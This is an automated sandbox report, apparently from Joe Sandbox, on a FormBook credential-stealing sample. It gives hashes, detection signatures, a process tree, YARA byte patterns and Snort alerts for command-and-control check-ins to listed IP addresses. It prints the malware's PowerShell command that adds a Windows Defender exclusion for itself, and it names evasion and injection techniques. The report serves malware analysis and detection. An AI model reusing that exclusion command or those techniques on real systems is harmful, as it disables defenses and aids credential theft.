Edit tour

Windows Analysis Report
eNXDCIvEXI.exe

Overview

General Information

Sample name:	eNXDCIvEXI.exe renamed because original name is a hash value
Original sample name:	650084a6aa83319aa801995935c36f0e2f4be3a537b6936a2f317df83909120f.exe
Analysis ID:	1452968
MD5:	1f11421fde0376d3fdb2d23041db6ed5
SHA1:	d2fa1972a539ae8451886b703d24aa5938a320cf
SHA256:	650084a6aa83319aa801995935c36f0e2f4be3a537b6936a2f317df83909120f
Tags:	exeFormbook
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected AntiVM3

Yara detected FormBook

Yara detected UAC Bypass using CMSTP

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Disables UAC (registry)

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Queues an APC in another process (thread injection)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses regedit.exe to modify the Windows registry

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file does not import any functions

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

eNXDCIvEXI.exe (PID: 7344 cmdline: "C:\Users\user\Desktop\eNXDCIvEXI.exe" MD5: 1F11421FDE0376D3FDB2D23041DB6ED5)

powershell.exe (PID: 7448 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\eNXDCIvEXI.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7744 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

regedit.exe (PID: 7488 cmdline: "C:\Windows\regedit.exe" MD5: 999A30979F6195BF562068639FFC4426)

calc.exe (PID: 7560 cmdline: "C:\Windows\System32\calc.exe" MD5: 5DA8C98136D98DFEC4716EDD79C7145F)

aspnet_wp.exe (PID: 7592 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe" MD5: EF2DCDFF05E9679F8D0E2895D9A2E3BB)

FCJpElfgCpDtTJPmdGdlIYAgNj.exe (PID: 3340 cmdline: "C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

chkdsk.exe (PID: 7852 cmdline: "C:\Windows\SysWOW64\chkdsk.exe" MD5: B4016BEE9D8F3AD3D02DD21C3CAFB922)

FCJpElfgCpDtTJPmdGdlIYAgNj.exe (PID: 4600 cmdline: "C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 3624 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

aspnet_wp.exe (PID: 7600 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe" MD5: EF2DCDFF05E9679F8D0E2895D9A2E3BB)

WerFault.exe (PID: 7672 cmdline: C:\Windows\system32\WerFault.exe -u -p 7344 -s 1632 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000C.00000002.4130637411.0000000004DC0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000C.00000002.4130637411.0000000004DC0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a260:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x138bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000C.00000002.4128948206.0000000000800000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000C.00000002.4128948206.0000000000800000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a260:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x138bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000C.00000002.4130704581.0000000004E00000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000C.00000002.4130704581.0000000004E00000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a260:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x138bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000011.00000002.4132492127.00000000052A0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000011.00000002.4132492127.00000000052A0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x388f7:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x21f56:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.1835227889.0000000005000000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.1835227889.0000000005000000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a260:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x138bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.1834831653.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.1834831653.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2dc53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x172b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000000.00000002.1880140655.0000021B80340000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000005.00000002.1836465483.00000000081C0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.1836465483.00000000081C0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x9c77cc:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9b0e2b:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000A.00000002.4130273413.0000000005600000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.4130273413.0000000005600000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x9c77cc:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9b0e2b:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Process Memory Space: eNXDCIvEXI.exe PID: 7344	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: eNXDCIvEXI.exe PID: 7344	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.aspnet_wp.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
5.2.aspnet_wp.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2dc53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x172b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
5.2.aspnet_wp.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
5.2.aspnet_wp.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2ce53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x164b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\eNXDCIvEXI.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\eNXDCIvEXI.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\eNXDCIvEXI.exe", ParentImage: C:\Users\user\Desktop\eNXDCIvEXI.exe, ParentProcessId: 7344, ParentProcessName: eNXDCIvEXI.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\eNXDCIvEXI.exe" -Force, ProcessId: 7448, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\eNXDCIvEXI.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\eNXDCIvEXI.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\eNXDCIvEXI.exe", ParentImage: C:\Users\user\Desktop\eNXDCIvEXI.exe, ParentProcessId: 7344, ParentProcessName: eNXDCIvEXI.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\eNXDCIvEXI.exe" -Force, ProcessId: 7448, ProcessName: powershell.exe

Snort Signatures

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 103.168.172.37

Timestamp:	06/06/24-13:27:33.326679
SID:	2855464
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 172.65.176.239

Timestamp:	06/06/24-13:25:26.238775
SID:	2855465
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 162.241.216.140

Timestamp:	06/06/24-13:26:08.833276
SID:	2855464
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 162.241.216.140

Timestamp:	06/06/24-13:29:14.686695
SID:	2855464
Source Port:	49794
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M4 - Source IP: 192.168.2.4 - Destination IP: 162.241.216.140

Timestamp:	06/06/24-13:25:42.135789
SID:	2856318
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 91.195.240.123

Timestamp:	06/06/24-13:26:38.908278
SID:	2855464
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 162.241.216.140

Timestamp:	06/06/24-13:25:44.667908
SID:	2855464
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 217.160.0.111

Timestamp:	06/06/24-13:26:29.812462
SID:	2855465
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 199.59.243.225

Timestamp:	06/06/24-13:28:11.901387
SID:	2855464
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 103.168.172.37

Timestamp:	06/06/24-13:27:41.611068
SID:	2855465
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 57.151.38.169

Timestamp:	06/06/24-13:25:55.515936
SID:	2855464
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 136.143.180.12

Timestamp:	06/06/24-13:27:11.747599
SID:	2855464
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 162.241.216.140

Timestamp:	06/06/24-13:28:55.215829
SID:	2855465
Source Port:	49789
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 136.143.180.12

Timestamp:	06/06/24-13:27:19.342074
SID:	2855465
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 57.151.38.169

Timestamp:	06/06/24-13:29:03.871692
SID:	2855464
Source Port:	49791
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 136.143.180.12

Timestamp:	06/06/24-13:27:14.281341
SID:	2855464
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 104.37.39.71

Timestamp:	06/06/24-13:27:49.969362
SID:	2855464
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 199.59.243.225

Timestamp:	06/06/24-13:28:16.966166
SID:	2855465
Source Port:	49784
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 162.241.216.140

Timestamp:	06/06/24-13:28:50.157425
SID:	2855464
Source Port:	49787
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 162.0.237.22

Timestamp:	06/06/24-13:26:57.622372
SID:	2855465
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 199.59.243.225

Timestamp:	06/06/24-13:28:09.334309
SID:	2855464
Source Port:	49781
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 162.0.237.22

Timestamp:	06/06/24-13:26:50.033320
SID:	2855464
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 103.168.172.37

Timestamp:	06/06/24-13:27:36.539281
SID:	2855464
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 104.37.39.71

Timestamp:	06/06/24-13:27:55.028027
SID:	2855465
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 172.65.176.239

Timestamp:	06/06/24-13:28:41.842825
SID:	2855465
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 57.151.38.169

Timestamp:	06/06/24-13:25:58.046973
SID:	2855464
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 162.0.237.22

Timestamp:	06/06/24-13:26:52.565318
SID:	2855464
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 217.160.0.111

Timestamp:	06/06/24-13:26:24.753306
SID:	2855464
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 57.151.38.169

Timestamp:	06/06/24-13:26:03.105993
SID:	2855465
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 162.241.216.140

Timestamp:	06/06/24-13:26:11.375901
SID:	2855464
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 162.241.216.140

Timestamp:	06/06/24-13:28:47.623380
SID:	2855464
Source Port:	49786
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 162.241.216.140

Timestamp:	06/06/24-13:25:42.135789
SID:	2855464
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 162.241.216.140

Timestamp:	06/06/24-13:25:49.730984
SID:	2855465
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 91.195.240.123

Timestamp:	06/06/24-13:26:44.036182
SID:	2855465
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 57.151.38.169

Timestamp:	06/06/24-13:29:08.950223
SID:	2855465
Source Port:	49793
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 162.241.216.140

Timestamp:	06/06/24-13:26:16.436568
SID:	2855465
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 91.195.240.123

Timestamp:	06/06/24-13:26:36.375957
SID:	2855464
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 217.160.0.111

Timestamp:	06/06/24-13:26:22.205167
SID:	2855464
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 104.37.39.71

Timestamp:	06/06/24-13:27:47.437482
SID:	2855464
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 57.151.38.169

Timestamp:	06/06/24-13:29:00.935368
SID:	2855464
Source Port:	49790
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: eNXDCIvEXI.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: eNXDCIvEXI.exe	Virustotal: Detection: 50%			Perma Link
Source: eNXDCIvEXI.exe	ReversingLabs: Detection: 60%

Yara detected FormBook

Source: Yara match	File source: 5.2.aspnet_wp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.aspnet_wp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.4130637411.0000000004DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4128948206.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4130704581.0000000004E00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4132492127.00000000052A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1835227889.0000000005000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1834831653.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1836465483.00000000081C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4130273413.0000000005600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: eNXDCIvEXI.exe

Joe Sandbox ML: detected

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 00000000.00000002.1880140655.0000021B80340000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: eNXDCIvEXI.exe PID: 7344, type: MEMORYSTR

Source: eNXDCIvEXI.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: System.ni.pdbRSDS source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: Microsoft.CSharp.pdb source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: wntdll.pdbUGP source: aspnet_wp.exe, 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, aspnet_wp.exe, 00000005.00000003.1720116499.00000000052F3000.00000004.00000020.00020000.00000000.sdmp, aspnet_wp.exe, 00000005.00000003.1716627525.0000000004EC5000.00000004.00000020.00020000.00000000.sdmp, aspnet_wp.exe, 00000005.00000002.1835508384.000000000563E000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000C.00000003.1834961654.0000000004E51000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 0000000C.00000002.4131036726.000000000535E000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000C.00000002.4131036726.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000C.00000003.1837166918.000000000500E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdb source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: wntdll.pdb source: aspnet_wp.exe, aspnet_wp.exe, 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, aspnet_wp.exe, 00000005.00000003.1720116499.00000000052F3000.00000004.00000020.00020000.00000000.sdmp, aspnet_wp.exe, 00000005.00000003.1716627525.0000000004EC5000.00000004.00000020.00020000.00000000.sdmp, aspnet_wp.exe, 00000005.00000002.1835508384.000000000563E000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 0000000C.00000003.1834961654.0000000004E51000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 0000000C.00000002.4131036726.000000000535E000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000C.00000002.4131036726.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000C.00000003.1837166918.000000000500E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: System.pdb source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: System.Core.ni.pdb source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: chkdsk.pdbGCTL source: aspnet_wp.exe, 00000005.00000002.1835368494.00000000051F7000.00000004.00000020.00020000.00000000.sdmp, FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 0000000A.00000002.4129545365.0000000001108000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WER3AAF.tmp.dmp.9.dr
